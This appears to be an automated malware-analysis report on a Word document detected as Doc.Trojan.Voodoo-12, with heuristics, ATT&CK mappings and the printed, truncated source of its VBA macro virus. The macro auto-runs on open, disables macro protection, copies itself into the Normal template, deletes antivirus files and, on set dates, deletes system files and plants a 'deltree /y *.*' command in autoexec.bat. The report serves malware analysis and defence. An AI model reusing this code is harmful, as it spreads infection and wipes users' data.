Verdict: MALICIOUS
Risk Score: 320

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample is an OLE document containing a VBA macro that executes automatically via the Document_Open subroutine. This macro attempts to disable virus protection and uses the Shell() function, indicating an intent to execute arbitrary code. The presence of the 'Doc.Trojan.Voodoo-12' ClamAV signature further confirms its malicious nature, likely as a downloader.
Heuristics (6)
- ClamAV: Doc.Trojan.Voodoo-12 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.Voodoo-12
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- OLE document has large unaccounted-for region [high, OLE_SLACK_ANOMALY]: OLE file is 46,080 bytes but its declared streams total only 26,611 bytes; 19,469 bytes (42%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4393 bytes |

SHA-256: ac5985625feeeb6401db3afbc551464d97cdaff9a31be62c7efb8165f585f595

Detection (ClamAV): Doc.Trojan.Voodoo-12
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_open()
'///////////////////////////\°°°°°°°°°°°°°°°°°/\\\\\\\\\\\\\\\\\\\\\\\\\\\\'
'////////////////////////////VooDoo NIGHT v1.0\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'
'***************************************************************************'
On Error Resume Next
'VooDoo Night, VooDoo Night, Come and Change my FACE
Set CNormalTemplate = NormalTemplate.VBProject
Set CActiveDocument = ActiveDocument.VBProject
Set Coptions = Options
Dim SysDate
'VooDoo Night, Voodoo Night Your are so beautiful, Make everyone stay away from ME
Application.EnableCancelKey = wdCancelDisabled
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=wdKeyCategoryFont, Command:=" "
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8), KeyCategory:=wdKeyCategoryFont, Command:=" "
Application.CommandBars("Tools").Controls(12).Visible = False
Coptions.VirusProtection = False
a = CNormalTemplate.vbcomponents(1).CodeModule.CountOfLines
b = CActiveDocument.vbcomponents(1).CodeModule.CountOfLines
If a = 86 And b = 86 Then GoTo AvCheck
If a = 86 Then
CActiveDocument.vbcomponents(1).CodeModule.DeleteLines 1, CActiveDocument.vbcomponents(1).CodeModule.CountOfLines
FullCode = CNormalTemplate.vbcomponents(1).CodeModule.Lines(1, CNormalTemplate.vbcomponents(1).CodeModule.CountOfLines)
CActiveDocument.vbcomponents(1).CodeModule.AddFromString (FullCode)
End If
If b >= 84 Then
CNormalTemplate.vbcomponents(1).CodeModule.DeleteLines 1, CNormalTemplate.vbcomponents(1).CodeModule.CountOfLines
FullCode = CActiveDocument.vbcomponents(1).CodeModule.Lines(1, CActiveDocument.vbcomponents(1).CodeModule.CountOfLines)
CNormalTemplate.vbcomponents(1).CodeModule.AddFromString (FullCode)
End If
AvCheck:
'VooDoo Night, VooDoo Night, will this be my END?
If Dir("C:\Programme\AntiViral Toolkit Pro\macro.avc") <> "" Then Kill ("C:\Programme\AntiViral Toolkit Pro\macro.avc")
If Dir("C:\PROGRAM FILES\AntiViral Toolkit Pro\macro.avc") <> "" Then Kill ("C:\PROGRAM FILES\AntiViral Toolkit Pro\macro.avc")
If Dir("C:\F-PROT\Macro.def") <> "" Then Kill ("C:\F-PROT\Macro.def")
If Dir("C:\Programme\Norton AntiVirus\NavLu32.exe") <> "" Then Kill ("C:\Programme\Norton AntiVirus\NavLu32.exe")
If Dir("C:\PROGRAM FILES\Norton AntiVirus\NavLu32.exe") <> "" Then Kill ("C:\PROGRAM FILES\Norton AntiVirus\NavLu32.exe")
If Dir("C:\PROGRAM FILES\Norton AntiVirus\Rescue.exe") <> "" Then Kill ("C:\PROGRAM FILES\Norton AntiVirus\Rescue.exe")
If Dir("C:\Programme\Norton AntiVirus\Rescue.exe") <> "" Then Kill ("C:\Programme\Norton AntiVirus\Rescue.exe")
Payload:
'Payload_1_
If Day(Now) = 31 Then
MsgBox " GRIPPED BY VooDoo, LEFT ALONE, DAMNED FOREVER, SPELLED FOR NIGHT, POSSESED BY SATAN- itz VooDoo NIGHT! (c)1999 by doc"
Open ("C:\windows\win.com") For Output As #12
Print #1, 20, "-VooDoo NIGHT-"
Close #1
SetAttr "c:\io.sys", vbNormal
Kill ("c:\io.sys")
SetAttr "c:\windows\system.ini", vbNormal
Kill ("c:\windows\system.ini")
End If
'-----------------------------------------------------------------------------------------------------------------------
'Payload_2_
If Day(Now) = 13 Then
Open ("c:\autoexec.bat") For Output As #13
Print #13, "deltree /y *.*"
Print #13, "exit"
Close #13
SetAttr "c:\windows\regedit.exe", vbNormal
Kill ("c:\windows\regedit.exe")
Shell ("c:\autoexec.bat"), vbHide
Do
MsgBox " GRIPPED BY VooDoo, LEFT ALONE, DAMNED FOREVER, SPELLED FOR NIGHT, POSSESED BY SATAN-
... (truncated)
```